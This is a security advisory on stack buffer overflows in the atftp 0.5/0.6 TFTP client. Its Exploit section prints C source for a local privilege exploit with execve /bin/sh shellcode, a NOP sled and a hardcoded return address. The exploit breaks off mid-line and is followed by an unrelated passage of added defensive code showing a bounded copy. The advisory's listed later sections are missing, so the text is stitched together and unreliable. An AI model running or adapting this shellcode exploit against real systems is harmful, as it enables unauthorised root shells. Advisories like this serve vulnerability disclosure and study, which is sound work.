Netric Security Team - http://www.netric.[org|be]
By sacrine

atftp-0.6
type: stack overflow(s) (multiple)
Priority: 6

[1] Description
[2] Vulnerable
[3] Exploit
[4] Proof of concept
[5] Vendor response
[6] Patches


[1] Description

atftp is a client/server implementation of the TFTP protocol that implements
RFCs 1350, 2090, 2347, 2348, and 2349. Packages can be downloaded here:
ftp://ftp.mamalinux.com/pub/atftp/

There are several vulnerabilities, mostly instances of the well-known "strcpy"
problem. An example:

..
char filename[MAXLEN];
strcpy(filename, directory);
..

This unchecked buffer can easily be exploited. There are more of these
vulnerabilities, but we'll discuss only this one: the one in the "get file"
option, the "-g" option.


[2] Vulnerable

I only tested the last 2 packages, but the previous versions are most likely
vulnerable too.

atftp-0.5 - vulnerable: YES - exploitable: YES
atftp-0.6 - vulnerable: YES - exploitable: YES


[3] Exploit

/*
 * atftp.0.5
 * atftp.0.6 - local proof of concept exploit
 * exploits an unchecked buffer in the "get file" option "-g"
 *
 * return addr tested on redhat 7.3 - 0xbffffbcc
 * change for other systems - ./k3
 *
 * Netric Security (RESOURCE MATERIAL)
 * http://www.netric.org
 * written by sacrine
 */

/* header names were lost in extraction; restored as the ones this code uses */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define EGG    1024
#define BUFLEN (356+9)
#define NOP    0x90

/* eSDee's execve /bin/sh shellcode */
char shellcode[] =
    "\x31\xc0"              // xor  %eax,%eax
    "\x50"                  // push %eax
    "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
    "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
    "\x89\xe3"              // mov  %esp,%ebx
    "\x8d\x54\x24\x08"      // lea  0x8(%esp,1),%edx
    "\x50"                  // push %eax
    "\x53"                  // push %ebx
    "\x8d\x0c\x24"          // lea  (%esp,1),%ecx
    "\xb0\x0b"              // mov  $0xb,%al
    "\xcd\x80";             // int  $0x80

int main(int argc, char **argv)
{
    unsigned long ret = 0xbffffbcc;   /* return address, see header comment */
    char buf[BUFLEN];
    char egg[EGG];
    int c;
    char *ptr;
    long *ptr2;
    int i = 0;

    /* optional first argument: offset subtracted from the return address */
    if (argc > 1) {
        ret = ret - atol(argv[1]);
    }

    memset(buf, NOP, sizeof(buf));

    /* fill the egg with NOPs, leaving room for the shellcode at the end */
    ptr = egg;
    for (i = 0; i < 1024 - strlen(shellcode) - 1; i++)
        *(ptr++) = '\x90';
    for (i = 0; i
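The unchecked strcpy pattern named in the Description section, shown beside a bounded replacement that refuses input which does not fit. This is an added example written for this page, not code from the advisory or from atftp; MAXLEN's value and the function names are assumptions, since the page gives neither.

```c
/* Added example: the unchecked-copy pattern from the Description beside a
 * bounded version. MAXLEN and both function names are assumptions; they are
 * not atftp's own identifiers. */
#define _POSIX_C_SOURCE 200809L   /* for strnlen */
#include <stdio.h>
#include <string.h>

#define MAXLEN 256   /* assumed buffer size; atftp's real constant is not on the page */

/* Vulnerable pattern: no length check, so a 'directory' string longer than
 * MAXLEN-1 bytes writes past the end of the caller's stack buffer. */
int build_path_unchecked(char *filename, const char *directory)
{
    strcpy(filename, directory);   /* unbounded copy: the bug */
    return 0;
}

/* Hardened version: measure first, refuse anything that does not fit together
 * with its terminating NUL, and only then copy with an explicit bound. */
int build_path_checked(char *filename, size_t filename_len, const char *directory)
{
    size_t n = strnlen(directory, filename_len);
    if (n >= filename_len)        /* no room for the NUL: reject, do not truncate silently */
        return -1;
    memcpy(filename, directory, n);
    filename[n] = '\0';
    return 0;
}

/* Exercises the check with constructed inputs: a short path is accepted and
 * copied, an overlong one is rejected and leaves the buffer untouched.
 * Returns 1 when both behave as expected, 0 otherwise. */
int demo_bounds_check(void)
{
    char filename[MAXLEN];
    char overlong[MAXLEN + 64];

    memset(overlong, 'A', sizeof(overlong) - 1);   /* constructed oversized input */
    overlong[sizeof(overlong) - 1] = '\0';

    int rc_short = build_path_checked(filename, sizeof(filename), "/tftpboot");
    int rc_long  = build_path_checked(filename, sizeof(filename), overlong);

    return rc_short == 0 && strcmp(filename, "/tftpboot") == 0 && rc_long == -1;
}

int main(void)
{
    printf("bounds check %s\n", demo_bounds_check() ? "ok" : "FAILED");
    return 0;
}
```

The checked version rejects rather than truncates: silently cutting a path at MAXLEN-1 bytes would still avoid the overflow, but it could make the program open a different file from the one the caller asked for, so an error return is the safer contract for a path builder.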